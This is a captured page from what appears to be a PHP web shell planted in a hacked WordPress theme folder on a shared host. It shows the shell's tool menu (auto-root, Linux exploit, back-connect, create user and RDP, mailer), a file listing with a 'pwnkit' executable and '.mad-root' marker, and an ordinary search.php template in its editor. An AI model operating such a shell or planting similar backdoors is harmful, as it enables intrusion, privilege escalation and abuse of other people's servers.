Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
enliven /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
828
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-jetpack-portfolio.php
2.17
KB
-rw-r--r--
archive-jetpack-testimonial.ph...
2.39
KB
-rw-r--r--
archive.php
1.81
KB
-rw-r--r--
comments.php
2.76
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
footer.php
1.98
KB
-rw-r--r--
functions.php
13.12
KB
-rw-r--r--
functionsbak.php
12.63
KB
-rw-r--r--
header.php
3.64
KB
-rw-r--r--
home.php
2.95
KB
-rw-r--r--
index.php
1.78
KB
-rw-r--r--
license.txt
17.32
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
page.php
1.54
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
9.38
KB
-rw-r--r--
screenshot.png
823.62
KB
-rw-r--r--
search.php
1.52
KB
-rw-r--r--
sidebar.php
298
B
-rw-r--r--
single-jetpack-portfolio.php
841
B
-rw-r--r--
single-jetpack-testimonial.php
814
B
-rw-r--r--
single.php
1.12
KB
-rw-r--r--
style.css
58.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.php
<?php /** * The template for displaying search results pages. * * @package Enliven */ get_header(); if( have_posts() ) : ?> <div class="hero-container nrml-banner"> <div class="hero-wrapper container"> <h1 class="page-title-hero"><?php printf( esc_html__( 'Search Results for: %s', 'enliven' ), '<span>' . get_search_query() . '</span>' ); ?></h1> </div><!-- .hero-wrapper --> </div><!-- .hero-container --> <?php endif; ?> <div class="container"> <div class="row"> <div class="col-xs-12 col-md-8 col-lg-8 enl-content-float"> <section id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <?php if ( have_posts() ) : ?> <?php /* Start the Loop */ ?> <?php while ( have_posts() ) : the_post(); ?> <?php /** * Run the loop for the search to output the results. * If you want to overload this in a child theme then include a file * called content-search.php and that will be used instead. */ get_template_part( 'template-parts/content', 'search' ); ?> <?php endwhile; ?> <?php the_posts_pagination(); ?> <?php else : ?> <?php get_template_part( 'template-parts/content', 'none' ); ?> <?php endif; ?> </main><!-- #main --> </section><!-- #primary --> </div><!--.bootstrap-cols --> <div class="col-xs-12 col-md-4 col-lg-4 enl-widgets-float"> <?php get_sidebar(); ?> </div><!--.bootstrap-cols --> </div><!-- .row --> </div><!-- .container --> <?php get_footer(); ?>
Close